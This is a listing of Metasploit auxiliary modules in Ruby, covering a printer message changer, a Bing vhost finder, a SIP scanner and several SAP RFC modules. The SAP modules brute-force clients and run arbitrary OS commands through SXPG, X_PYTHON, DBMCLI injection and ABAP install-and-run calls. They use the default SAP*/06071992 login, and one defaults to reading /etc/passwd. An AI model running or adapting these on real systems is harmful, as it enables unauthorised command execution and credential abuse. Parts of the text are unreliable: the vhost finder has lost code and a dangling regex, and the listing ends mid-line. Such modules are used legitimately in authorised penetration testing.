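    print_line("\n#{tbl.to_s}")
    save_output(tbl.to_s) if not datastore['OUTFILE'].nil?
  end

  # Entry point. Connection problems are reported instead of silently ignored.
  def run()

    begin
      print_status("NetcRafting results:")
      do_search_netcraft(datastore['KEYWORD'])

    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
      print_error("Connection to #{netcraft_url} failed: #{e.class}")
    rescue ::Timeout::Error, ::Errno::EPIPE => e
      print_error("Request to #{netcraft_url} failed: #{e.class}")
    end

  end

end
--------------------------------------------------------------------------------
/modules/auxiliary/hp/hp_laserjet_ready_msg.rb:
--------------------------------------------------------------------------------
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  def initialize(info={})
    super(update_info(info,
      'Name'        => 'HP LaserJet Printer Replace READY Message',
      'Description' => %q{
        This module allows to specifie a message that replaces the READY
        message on the printer control panel. Does not affect online state.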
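      },
      'References'  =>
        [
          ['URL', 'http://h20000.www2.hp.com/bc/docs/support/SupportManual/bpl13208/bpl13208.pdf']
        ],
      'Author'      => 'Matteo Cantoni ',
      'License'     => MSF_LICENSE
    ))

    register_options(
      [
        Opt::RPORT(9100),
        OptString.new('MESSAGE', [true, 'The message that will appear on the printer control panel', 'MSF!'])
      ], self.class)

    # Raw PJL over TCP/9100; there is no HTTP virtual host to configure.
    deregister_options('VHOST')
  end

  # PJL commands are recognized by the following HP printers:
  #
  # . LaserJet IIISi, 4Si, 4SiMx, 5Si, 5SiMx, 5Si Mopier
  # . LaserJet 1100 Series, 2100 Series
  # . LaserJet 4000 Series, 5000 Series
  # . LaserJet 8000 Series, 8100 Series
  # . LaserJet 4V, 4MV
  # . LaserJet 4, 4 Plus, 4M, 4M Plus, 5, 5M
  # . LaserJet 4L, 4ML, 4LJ Pro, 4LC, 5L, 6L
  # . LaserJet 4P, 4MP, 4PJ, 5P, 6P, 6MP
  # . Color LaserJet, Color LaserJet 5, 5M
  # . Color LaserJet 4500 Series, 8500 Series
  # . DeskJet 1200C, 1600C
  # . DesignJet Family
  # . PaintJet XL300

  # 1 to 16 printable characters, none of them a double quote, as the PJL
  # manual requires for RDYMSG. Control characters are rejected as well:
  # a CR/LF inside MESSAGE would terminate the command and let a second,
  # arbitrary PJL statement ride along in the same request, which the
  # original length/quote check did not prevent.
  RDYMSG_FORMAT = /\A[^"[:cntrl:]]{1,16}\z/

  # Sends one PJL RDYMSG command to ip:RPORT so that MESSAGE replaces the
  # "00 READY" text on the control panel. The printer sends no reply, so
  # the result can only be confirmed by looking at the panel.
  def run_host(ip)

    port = datastore['RPORT']

    # The message can be any combination of printable characters (except
    # quotation marks, character 34) and spaces, with a limit of 1 line
    # of 16 characters. The message variable is a string and must be
    # enclosed in double quotes as shown in the command syntax.
    message = datastore['MESSAGE']

    unless message =~ RDYMSG_FORMAT
      print_error("Message invalid. Max 16 printable characters and no quotation marks.")
      return
    end

    print_status("Connecting to #{ip}:#{port}...")

    conn = connect

    # Format of PJL Commands - #4
    #
    # @PJL command [command modifier : value] [option name [= value]] [<CR>]<LF>
    # This format is used for all of the other PJL commands.
    # The PJL prefix "@PJL" always must be uppercase.
    prefix  = "@PJL "
    postfix = "\r\n"

    # RDYMSG specifies a "ready message" that replaces the "00 READY"
    # message on the printer control panel. The RDYMSG command does
    # not affect the online state.
    command = 'RDYMSG DISPLAY = "' + message + '"'

    req = prefix + command + postfix

    vprint_status("Sending request to #{ip}: #{req.chop}")

    begin
      conn.put(req)

      # Using RDYMSG command we cannot wait for an answer.. so we go away!
      print_status("Now you can manually verify on printer control panel.")
    ensure
      # Release the socket even if put raises; the original only disconnected
      # on the happy path.
      disconnect
    end
  end
end
--------------------------------------------------------------------------------
/modules/auxiliary/http/vhost_finder.rb:
--------------------------------------------------------------------------------
##
# $Id: http_version.rb 9579 2010-06-22 01:39:43Z egypt $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'anemone/http'


class Metasploit3 < Msf::Auxiliary

  include Msf::Auxiliary::Report

  def initialize
    super(
      'Name'        => 'VHOST finder using Bing.',
      'Description' => %q{Find all VHOST's belongs to particular IP(s) using Bing.
        Without setting BING_API_KEY module makes simple query to bing.com and parses results.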
        Keep in mind that returned results from Bing API are usually limited compare to these
        obtained from bing.com},
      'Version'     => '$Revision:$',
      'Author'      => 'Marcin \'Icewall\' Noga ',
      'License'     => MSF_LICENSE
    )

    register_options(
      [
        OptAddressRange.new('IPRANGE',[true,'The IP or address range for which you want to check vhosts.','']),
        OptString.new('BING_API_KEY',[false,'Set Bing API Key to use API interface.','']),
        OptBool.new('FULL_URL',[false,'Display all found URLs related with specific IP(s). When this option is set to false only domains will be displayed.',false])
      ],self.class)
  end

  # Resets per-run state and selects the search backend: bing.com HTML
  # scraping when BING_API_KEY is empty, the Bing API otherwise.
  #
  # NOTE(review): the HTML-scraping regex and the whole API branch (its
  # @amount / @url / @rule assignments, presumably between `@rule = /` and
  # the closing `end`) were lost when this listing was extracted -- the
  # regex that remains below is a fragment of the API one. Recover this
  # method from the repository before relying on it.
  def init()
    @vhosts = [] #array contains found vhosts
    @key = datastore['BING_API_KEY']
    @offset = 0
    if @key.empty? #Simple Bing search settings
      @amount = 10 #amount of results per page (in this mode without setting special cookie u can't increase this value)
      @url = "http://www.bing.com/search?q=ip:%s&first=%d" #base url
      @rule = /

(.*?)<\/web:Url>/
    end
  end

  # Entry point: walks IPRANGE, collects the vhosts Bing reports for each
  # address, prints them and records each one as a web site.
  def run()
    init()
    ip_range = Rex::Socket::RangeWalker.new(datastore['IPRANGE'])
    while(true)
      @ip = ip_range.next_ip()
      break if not @ip
      find_vhosts()
      #check whether result should only contains domains
      remove_duplicates() if not datastore['FULL_URL']
      print_status("VHOSTS for #{@ip}:")
      #sort results and report them
      @vhosts.sort!.each do |item|
        print_good(item)
        # NOTE(review): URI.encode was deprecated in Ruby 2.7 and removed in
        # 3.0, so this raises NoMethodError on current interpreters. The
        # host/port reported below come straight from Bing's results.
        uri = URI(URI.encode(item))
        report_web_site(
          :host => @ip,
          :vhost => uri.host,
          :port => uri.port
        )
      end
      reset()
    end
  end

  # Fetches result pages for the current @ip until next? reports no more,
  # appending every @rule match to @vhosts.
  # Returns the result of flatten!, i.e. nil when nothing needed flattening;
  # callers in this file ignore the return value.
  def find_vhosts()
    http = Anemone::HTTP.new()
    begin
      page = http.fetch_page( get_url() )
      @vhosts += page.body.scan(@rule)
    end while (next?(page.body))
    #just make sure vhosts array is flat
    return @vhosts.flatten!
  end

  # Decides whether another page should be fetched and advances @offset by
  # the page size either way.
  # NOTE(review): in API mode `body.match(...)[1]` raises NoMethodError when
  # the total-count element is missing from the reply (error page, quota
  # exceeded); the opening tag of that element was also lost in extraction.
  def next?(body)
    if @key.empty?
      flag = body.include?("class=\"sb_pagN\"")#simple check whether 'Next' page url exists
    else
      total = body.match(/(.*?)<\/web:Total>/)[1].to_i
      flag = (total > @offset + @amount)
    end
    @offset += @amount
    return flag
  end

  # Collapses @vhosts to unique "scheme://host" strings (FULL_URL false).
  # Uses URI.encode as well; see the note in run.
  def remove_duplicates()
    @vhosts = @vhosts.collect do |url|
      uri = URI(URI.encode(url)) #encode url first to avoid errors
      "%s://%s" % [uri.scheme,uri.host]
    end
    #we are interested only in uniq domains
    @vhosts.uniq!
106 | end 107 | 108 | def get_url() 109 | if @key.empty?#return proper url for simple search 110 | return @url % [@ip,@offset] 111 | end 112 | #return proper url for Bing_api 113 | return @url % [@key,@ip,@amount,@offset] 114 | end 115 | def reset() 116 | @vhosts.clear() 117 | @offset = 0 118 | end 119 | end 120 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/sap/sap_rfc_client_enum.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http//metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | ## 7 | # This module is based on, inspired by, or is a port of a plugin 8 | # available in the Onapsis Bizploit Opensource ERP Penetration Testing 9 | # framework - http://www.onapsis.com/research-free-solutions.php. 10 | # Mariano Nunez (the author of the Bizploit framework) helped me in my 11 | # efforts in producing the Metasploit modules and was happy to share his 12 | # knowledge and experience - a very cool guy. 13 | # 14 | # The following guys from ERP-SCAN deserve credit for their 15 | # contributions Alexandr Polyakov, Alexey Sintsov, Alexey Tyurin, Dmitry 16 | # Chastukhin and Dmitry Evdokimov. 17 | # 18 | # I'd also like to thank Chris John Riley, Ian de Villiers and Joris van 19 | # de Vis who have Beta tested the modules and provided excellent 20 | # feedback. Some people just seem to enjoy hacking SAP :) 21 | ## 22 | 23 | require 'msf/core' 24 | require 'msf/core/exploit/sap' 25 | 26 | class Metasploit4 < Msf::Auxiliary 27 | 28 | include Msf::Exploit::SAP::RFC 29 | include Msf::Auxiliary::Report 30 | include Msf::Auxiliary::Scanner 31 | 32 | def initialize 33 | super( 34 | 'Name' => 'SAP RFC Client Enumerator', 35 | 'Description' => %q{ 36 | This module attempts to brute force the available SAP clients via the RFC interface. 
37 | Default clients can be tested without needing to set a CLIENT. 38 | This module can execute through a SAP Router if SRHOST and SRPORT values are set. 39 | The module requires the NW RFC SDK from SAP as well as the Ruby wrapper nwrfc (http://rubygems.org/gems/nwrfc). 40 | }, 41 | 'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]], 42 | 'Author' => [ 'nmonkee' ], 43 | 'License' => BSD_LICENSE 44 | ) 45 | 46 | register_options( 47 | [ 48 | OptString.new('CLIENT', [true, 'Client can be single (066), comma separated list (000,001,066) or range (000-999)', '000,001,066']), 49 | ], self.class) 50 | end 51 | 52 | def run_host(rhost) 53 | user = Rex::Text.rand_text_alpha(8) 54 | password = Rex::Text.rand_text_alpha(8) 55 | rport = datastore['RPORT'] 56 | 57 | saptbl = Msf::Ui::Console::Table.new( 58 | Msf::Ui::Console::Table::Style::Default, 59 | 'Header' => "[SAP] Clients #{rhost}:#{rport}", 60 | 'Columns' => 61 | [ 62 | "host", 63 | "port", 64 | "client", 65 | ]) 66 | 67 | client_list.each do |client| 68 | vprint_status("#{rhost}:#{rport} [SAP] trying client: #{client}") 69 | begin 70 | login(rhost, rport, client, user, password) do |conn| 71 | saptbl << successful_login(rhost, rport, client, user, password) 72 | end 73 | rescue NWError => e 74 | case e.code 75 | when :RFC_COMMUNICATION_FAILURE 76 | break 77 | when :RFC_LOGON_FAILURE 78 | case e.message 79 | when /Name or password is incorrect/i 80 | saptbl << successful_login(rhost, rport, client, user, password) 81 | end 82 | end 83 | end 84 | end 85 | 86 | if saptbl.rows.count > 0 87 | print(saptbl.to_s) 88 | end 89 | end 90 | 91 | def successful_login(rhost, rport, client, user, password) 92 | print_good("#{rhost}:#{rport} [SAP] client found: #{client}") 93 | report_auth_info( 94 | :host => rhost, 95 | :sname => 'sap-gateway', 96 | :proto => 'tcp', 97 | :port => rport, 98 | :client => client, 99 | :user => user, 100 | :pass => password, 101 | :sysnr => system_number(rport), 102 | :source_type => 
'user_supplied', 103 | :target_host => rhost, 104 | :target_port => rport 105 | ) 106 | 107 | [rhost, rport, client] 108 | end 109 | end 110 | 111 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/sap/sap_rfc_dbmcli_sxpg_command_exec.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http//metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | ## 7 | # This module is based on, inspired by, or is a port of a plugin 8 | # available in the Onapsis Bizploit Opensource ERP Penetration Testing 9 | # framework - http://www.onapsis.com/research-free-solutions.php. 10 | # Mariano Nunez (the author of the Bizploit framework) helped me in my 11 | # efforts in producing the Metasploit modules and was happy to share his 12 | # knowledge and experience - a very cool guy. 13 | # 14 | # The following guys from ERP-SCAN deserve credit for their 15 | # contributions Alexandr Polyakov, Alexey Sintsov, Alexey Tyurin, Dmitry 16 | # Chastukhin and Dmitry Evdokimov. 17 | # 18 | # I'd also like to thank Chris John Riley, Ian de Villiers and Joris van 19 | # de Vis who have Beta tested the modules and provided excellent 20 | # feedback. Some people just seem to enjoy hacking SAP :) 21 | ## 22 | 23 | require 'msf/core' 24 | require 'msf/core/exploit/sap' 25 | 26 | class Metasploit4 < Msf::Auxiliary 27 | 28 | include Msf::Exploit::SAP::RFC 29 | include Msf::Auxiliary::Report 30 | include Msf::Auxiliary::Scanner 31 | 32 | def initialize 33 | super( 34 | 'Name' => 'SAP RFC DBMCLI SXPG_COMMAND_EXEC', 35 | 'Description' => %q{ 36 | This module makes use of the SXPG_COMMAND_EXEC Remote Function Call to execute OS commands as configured in SM69. 37 | It uses the DBMCLI parameter injection to write OS commands to a file for execution. 
38 | The module requires the NW RFC SDK from SAP as well as the Ruby wrapper nwrfc (http://rubygems.org/gems/nwrfc). 39 | }, 40 | 'References' => [[ 'URL', 'https://labs.mwrinfosecurity.com/blog/2012/09/03/sap-parameter-injection/' ]], 41 | 'Author' => [ 'nmonkee' ], 42 | 'License' => BSD_LICENSE, 43 | ) 44 | 45 | register_options( 46 | [ 47 | OptString.new('USERNAME', [true, 'Username', 'SAP*']), 48 | OptString.new('PASSWORD', [true, 'Password', '06071992']), 49 | OptString.new('CMD', [true, 'Command', 'id']), 50 | OptEnum.new('OS', [true, 'Target OS','Linux',['Linux', 'Windows']]) 51 | ], self.class) 52 | end 53 | 54 | def run_host(rhost) 55 | user = datastore['USERNAME'] 56 | password = datastore['PASSWORD'] 57 | unless datastore['CLIENT'] =~ /^\d{3}\z/ 58 | fail_with(Exploit::Failure::BadConfig, "CLIENT in wrong format") 59 | end 60 | 61 | opts = { 62 | :rhost => rhost, 63 | :rport => rport, 64 | :client => client, 65 | :user => user, 66 | :pass => password 67 | } 68 | 69 | res = dbmcli_sxpg_execute(datastore['OS'], datastore['CMD'], opts) 70 | 71 | print res 72 | end 73 | 74 | end 75 | 76 | 77 | 78 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/sap/sap_rfc_python_sxpg_command_exec.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http//metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | ## 7 | # This module is based on, inspired by, or is a port of a plugin 8 | # available in the Onapsis Bizploit Opensource ERP Penetration Testing 9 | # framework - http://www.onapsis.com/research-free-solutions.php. 10 | # Mariano Nunez (the author of the Bizploit framework) helped me in my 11 | # efforts in producing the Metasploit modules and was happy to share his 12 | # knowledge and experience - a very cool guy. 
13 | # 14 | # The following guys from ERP-SCAN deserve credit for their 15 | # contributions Alexandr Polyakov, Alexey Sintsov, Alexey Tyurin, Dmitry 16 | # Chastukhin and Dmitry Evdokimov. 17 | # 18 | # I'd also like to thank Chris John Riley, Ian de Villiers and Joris van 19 | # de Vis who have Beta tested the modules and provided excellent 20 | # feedback. Some people just seem to enjoy hacking SAP :) 21 | ## 22 | 23 | require 'msf/core' 24 | require 'msf/core/exploit/sap' 25 | 26 | class Metasploit4 < Msf::Auxiliary 27 | 28 | include Msf::Exploit::SAP::RFC 29 | include Msf::Auxiliary::Report 30 | include Msf::Auxiliary::Scanner 31 | 32 | def initialize 33 | super( 34 | 'Name' => 'SAP RFC X_PYTHON SXPG_COMMAND_EXEC', 35 | 'Description' => %q{ 36 | This module makes use of the SXPG_COMMAND_EXEC Remote Function Call to execute OS commands as configured in SM69. 37 | It uses the X_PYTHON library to execute the command and returns the call output plus the exit code. 38 | The module requires the NW RFC SDK from SAP as well as the Ruby wrapper nwrfc (http://rubygems.org/gems/nwrfc). 
39 | }, 40 | 'References' => [[ 'URL', 'https://labs.mwrinfosecurity.com/' ]], 41 | 'Author' => [ 'Ben Campbell', 'nmonkee' ], 42 | 'License' => MSF_LICENSE, 43 | ) 44 | 45 | register_options( 46 | [ 47 | OptString.new('USERNAME', [true, 'Username', 'SAP*']), 48 | OptString.new('PASSWORD', [true, 'Password', '06071992']), 49 | OptString.new('CMD', [true, 'Command', 'id']), 50 | ], self.class) 51 | end 52 | 53 | def run_host(rhost) 54 | res = nil 55 | user = datastore['USERNAME'] 56 | password = datastore['PASSWORD'] 57 | unless datastore['CLIENT'] =~ /^\d{3}\z/ 58 | fail_with(Exploit::Failure::BadConfig, "CLIENT in wrong format") 59 | end 60 | 61 | cmd = encode_command_python(datastore['CMD']) 62 | exec = encode_python(cmd) 63 | 64 | if exec.length > 255 65 | # do python stager to file like exploit if needed 66 | print_error("#{rhost}:#{rport} [SAP] Encoded command length must not exceed 255 characters - #{exec.length}") 67 | else 68 | opts = { 69 | :OPERATINGSYSTEM => 'ANYOS', 70 | :COMMANDNAME => 'X_PYTHON', 71 | :ADDITIONAL_PARAMETERS => exec 72 | } 73 | 74 | login(rhost, rport, client, user, password) do |conn| 75 | res = sxpg_command_execute(conn, opts) 76 | end 77 | end 78 | 79 | if res 80 | print_line res 81 | else 82 | print_error("#{rhost}:#{rport} [SAP] No response from cmd '#{datastore['CMD']}'") 83 | end 84 | end 85 | 86 | end 87 | 88 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/sap/sap_rfc_sxpg_call_system.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http//metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | ## 7 | # This module is based on, inspired by, or is a port of a plugin 8 | # available in the Onapsis Bizploit Opensource ERP Penetration Testing 9 | # framework - http://www.onapsis.com/research-free-solutions.php. 
10 | # Mariano Nunez (the author of the Bizploit framework) helped me in my 11 | # efforts in producing the Metasploit modules and was happy to share his 12 | # knowledge and experience - a very cool guy. 13 | # 14 | # The following guys from ERP-SCAN deserve credit for their 15 | # contributions Alexandr Polyakov, Alexey Sintsov, Alexey Tyurin, Dmitry 16 | # Chastukhin and Dmitry Evdokimov. 17 | # 18 | # I'd also like to thank Chris John Riley, Ian de Villiers and Joris van 19 | # de Vis who have Beta tested the modules and provided excellent 20 | # feedback. Some people just seem to enjoy hacking SAP :) 21 | ## 22 | 23 | require 'msf/core' 24 | require 'msf/core/exploit/sap' 25 | 26 | class Metasploit4 < Msf::Auxiliary 27 | 28 | include Msf::Exploit::SAP::RFC 29 | include Msf::Auxiliary::Report 30 | include Msf::Auxiliary::Scanner 31 | 32 | def initialize 33 | super( 34 | 'Name' => 'SAP RFC SXPG_CALL_SYSTEM', 35 | 'Description' => %q{ 36 | This module makes use of the SXPG_CALL_SYSTEM Remote Function Call to execute OS commands as configured in SM69. 37 | The module requires the NW RFC SDK from SAP as well as the Ruby wrapper nwrfc (http://rubygems.org/gems/nwrfc). 
38 | }, 39 | 'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]], 40 | 'Author' => [ 'nmonkee' ], 41 | 'License' => BSD_LICENSE, 42 | 'DefaultOptions' => { 43 | 'CLIENT' => "000" 44 | } 45 | ) 46 | 47 | register_options( 48 | [ 49 | OptString.new('USERNAME', [true, 'Username', 'SAP*']), 50 | OptString.new('PASSWORD', [true, 'Password', '06071992']), 51 | OptString.new('CMD', [true, 'Command Name as in SM69', 'ENV']), 52 | OptString.new('PARAM', [false, 'Command Parameters', '']), 53 | ], self.class) 54 | end 55 | 56 | def run_host(rhost) 57 | user = datastore['USERNAME'] 58 | pass = datastore['PASSWORD'] 59 | unless datastore['CLIENT'] =~ /^\d{3}\z/ 60 | fail_with(Exploit::Failure::BadConfig, "CLIENT in wrong format") 61 | end 62 | 63 | res = exec_CMD(user,datastore['CLIENT'],pass,rhost,datastore['RPORT'], datastore['CMD'], datastore['PARAM']) 64 | if res.blank? 65 | print_error("#{rhost}:#{rport} [SAP] No output returned") 66 | else 67 | print res 68 | end 69 | end 70 | 71 | def exec_CMD(user, client, password, rhost, rport, cmd, param) 72 | data = nil 73 | param = '' unless param 74 | 75 | login(rhost, rport, client, user, password) do |conn| 76 | conn.connection_info 77 | begin 78 | data = sxpg_call_system(conn, {:COMMANDNAME => cmd, :ADDITIONAL_PARAMETERS => param}) 79 | rescue NWError => e 80 | print_error("#{rhost}:#{rport} [SAP] #{e.code} - #{e.message}") 81 | end 82 | end 83 | 84 | data 85 | end 86 | end 87 | 88 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/sap/sap_rfc_sxpg_command_exec.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http//metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | ## 7 | # This module is based on, inspired by, or is a port of a plugin 8 | # available in the Onapsis Bizploit Opensource ERP Penetration Testing 9 | # 
framework - http://www.onapsis.com/research-free-solutions.php. 10 | # Mariano Nunez (the author of the Bizploit framework) helped me in my 11 | # efforts in producing the Metasploit modules and was happy to share his 12 | # knowledge and experience - a very cool guy. 13 | # 14 | # The following guys from ERP-SCAN deserve credit for their 15 | # contributions Alexandr Polyakov, Alexey Sintsov, Alexey Tyurin, Dmitry 16 | # Chastukhin and Dmitry Evdokimov. 17 | # 18 | # I'd also like to thank Chris John Riley, Ian de Villiers and Joris van 19 | # de Vis who have Beta tested the modules and provided excellent 20 | # feedback. Some people just seem to enjoy hacking SAP :) 21 | ## 22 | 23 | require 'msf/core' 24 | require 'msf/core/exploit/sap' 25 | 26 | class Metasploit4 < Msf::Auxiliary 27 | 28 | include Msf::Exploit::SAP::RFC 29 | include Msf::Auxiliary::Report 30 | include Msf::Auxiliary::Scanner 31 | 32 | def initialize 33 | super( 34 | 'Name' => 'SAP RFC SXPG_COMMAND_EXECUTE', 35 | 'Description' => %q{ 36 | This module makes use of the SXPG_COMMAND_EXECUTE Remote Function Call to execute OS commands as configured in SM69. 37 | The module requires the NW RFC SDK from SAP as well as the Ruby wrapper nwrfc (http://rubygems.org/gems/nwrfc). 
38 | }, 39 | 'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]], 40 | 'Author' => [ 'nmonkee' ], 41 | 'License' => BSD_LICENSE, 42 | 'DefaultOptions' => { 'CLIENT' => '000' } 43 | ) 44 | 45 | register_options( 46 | [ 47 | OptString.new('USERNAME', [true, 'Username', 'SAP*']), 48 | OptString.new('PASSWORD', [true, 'Password', '06071992']), 49 | OptString.new('CMD', [true, 'Command Name as in SM69', 'CAT']), 50 | OptString.new('PARAM', [false, 'Command Parameters', '/etc/passwd']), 51 | OptEnum.new('OS', [true, 'SM69 Target OS','UNIX',['ANYOS', 'UNIX', 'Windows NT', 'AS/400', 'OS/400']]) 52 | ], self.class) 53 | end 54 | 55 | def run_host(rhost) 56 | user = datastore['USERNAME'] 57 | pass = datastore['PASSWORD'] 58 | 59 | unless datastore['CLIENT'] =~ /^\d{3}\z/ 60 | fail_with(Exploit::Failure::BadConfig, "CLIENT in wrong format") 61 | end 62 | 63 | os = datastore['OS'] 64 | 65 | res = exec_CMD(user,datastore['CLIENT'],pass,rhost,datastore['rport'], datastore['CMD'], datastore['PARAM'], os) 66 | if res.blank? 
67 | print_error("#{rhost}:#{rport} [SAP] No output returned") 68 | else 69 | print res 70 | end 71 | end 72 | 73 | def exec_CMD(user, client, pass, rhost, rport, cmd, param, os) 74 | data = nil 75 | param = '' unless param 76 | 77 | login(rhost, rport, client, user, pass) do |conn| 78 | conn.connection_info 79 | 80 | begin 81 | data = sxpg_command_execute(conn, 82 | { 83 | :COMMANDNAME => cmd, 84 | :OPERATINGSYSTEM => os, 85 | :ADDITIONAL_PARAMETERS => param 86 | }) 87 | rescue NWError => e 88 | print_error("#{rhost}:#{rport} [SAP] #{e.code} - #{e.message}") 89 | end 90 | end 91 | 92 | data 93 | end 94 | end 95 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/sap/sap_rfc_system.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http//metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | ## 7 | # This module is based on, inspired by, or is a port of a plugin 8 | # available in the Onapsis Bizploit Opensource ERP Penetration Testing 9 | # framework - http://www.onapsis.com/research-free-solutions.php. 10 | # Mariano Nunez (the author of the Bizploit framework) helped me in my 11 | # efforts in producing the Metasploit modules and was happy to share his 12 | # knowledge and experience - a very cool guy. 13 | # 14 | # The following guys from ERP-SCAN deserve credit for their 15 | # contributions Alexandr Polyakov, Alexey Sintsov, Alexey Tyurin, Dmitry 16 | # Chastukhin and Dmitry Evdokimov. 17 | # 18 | # I'd also like to thank Chris John Riley, Ian de Villiers and Joris van 19 | # de Vis who have Beta tested the modules and provided excellent 20 | # feedback. 
Some people just seem to enjoy hacking SAP :) 21 | ## 22 | 23 | require 'msf/core' 24 | require 'msf/core/exploit/sap' 25 | 26 | class Metasploit4 < Msf::Auxiliary 27 | 28 | include Msf::Exploit::SAP::RFC 29 | include Msf::Auxiliary::Report 30 | include Msf::Auxiliary::Scanner 31 | 32 | def initialize 33 | super( 34 | 'Name' => 'SAP RFC ABAP INSTALL AND RUN Command Execution', 35 | 'Description' => %q{ 36 | This module makes use of the RFC_ABAP_INSTALL_AND_RUN Remote Function Call to execute arbitrary SYSTEM commands. 37 | RFC_ABAP_INSTALL_AND_RUN takes ABAP source lines and executes them. It is common for the the function to be disabled or access revoked in a production system. It is also deprecated. 38 | The module requires the NW RFC SDK from SAP as well as the Ruby wrapper nwrfc (http://rubygems.org/gems/nwrfc). 39 | }, 40 | 'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]], 41 | 'Author' => [ 'nmonkee' ], 42 | 'License' => BSD_LICENSE, 43 | 'DefaultOptions' => { 44 | 'CLIENT' => "000" 45 | } 46 | ) 47 | 48 | register_options( 49 | [ 50 | OptString.new('USERNAME', [true, 'Username', 'SAP*']), 51 | OptString.new('PASSWORD', [true, 'Password', '06071992']), 52 | OptString.new('CMD', [true, 'Command to Execute', 'id']), 53 | ], self.class) 54 | end 55 | 56 | def run_host(rhost) 57 | unless datastore['CLIENT'] =~ /^\d{3}\z/ 58 | fail_with(Exploit::Failure::BadConfig, "CLIENT in wrong format") 59 | end 60 | command = datastore['CMD'] 61 | login(rhost, rport, client, datastore['USERNAME'], datastore['PASSWORD']) do |conn| 62 | begin 63 | data = rfc_abap_install_and_run_cmd(conn, command) 64 | print_good("#{rhost}:#{rport} [SAP] Executed #{command}") 65 | print_line(data) 66 | rescue NWError => e 67 | print_error("#{rhost}:#{rport} [SAP] #{e.code} - #{e.message}") 68 | end 69 | end 70 | end 71 | 72 | end 73 | 74 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/sip/vsipoptions.rb: 
-------------------------------------------------------------------------------- 1 | ## 2 | # This file is part of the Metasploit Framework and may be subject to 3 | # redistribution and commercial restrictions. Please see the Metasploit 4 | # Framework web site for more information on licensing and terms of use. 5 | # http://metasploit.com/framework/ 6 | ## 7 | 8 | 9 | require 'msf/core' 10 | require 'digest/md5' 11 | 12 | class Metasploit3 < Msf::Auxiliary 13 | 14 | include Msf::Auxiliary::Report 15 | include Msf::Auxiliary::Scanner 16 | include Msf::Auxiliary::SIP 17 | 18 | def initialize 19 | super( 20 | 'Name' => 'SIP Options Discovery (UDP)', 21 | 'Version' => '1', 22 | 'Description' => 'Options Discovery Module for SIP Services', 23 | 'Author' => 'Fatih Ozavci ', 24 | 'License' => MSF_LICENSE 25 | ) 26 | 27 | register_options( 28 | [ 29 | OptString.new('REALM', [ true, "The login realm to probe at each host", "realm.com.tr"]), 30 | OptString.new('TO', [ true, "The destination username to probe at each host", "100"]), 31 | OptString.new('FROM', [ true, "The source username to probe at each host", "100"]), 32 | Opt::RPORT(5060), 33 | Opt::CHOST, 34 | Opt::CPORT(5065) 35 | ], self.class) 36 | 37 | register_advanced_options( 38 | [ 39 | OptBool.new('DEBUG', [ false, "Verbose Level", false]), 40 | OptBool.new('VERBOSE', [ false, "Verbose Level", false]) 41 | ], self.class) 42 | end 43 | 44 | 45 | def run_host(dest_addr) 46 | 47 | udp_sock = nil 48 | 49 | realm = datastore['REALM'] 50 | from = datastore['FROM'] 51 | to = datastore['TO'] 52 | listen_addr = datastore['CHOST'] 53 | listen_port = datastore['CPORT'].to_i 54 | dest_port = datastore['RPORT'].to_i 55 | 56 | 57 | 58 | start_sipsrv(listen_port,listen_addr,dest_port,dest_addr) 59 | 60 | result,rdata,rdebug,rawdata = send_options( 61 | 'realm' => realm, 62 | 'from' => from, 63 | 'to' => to 64 | ) 65 | 66 | case result 67 | when :received 68 | report = "#{rdata['source']}\tResponse: #{rdata['resp_msg'].split(" 
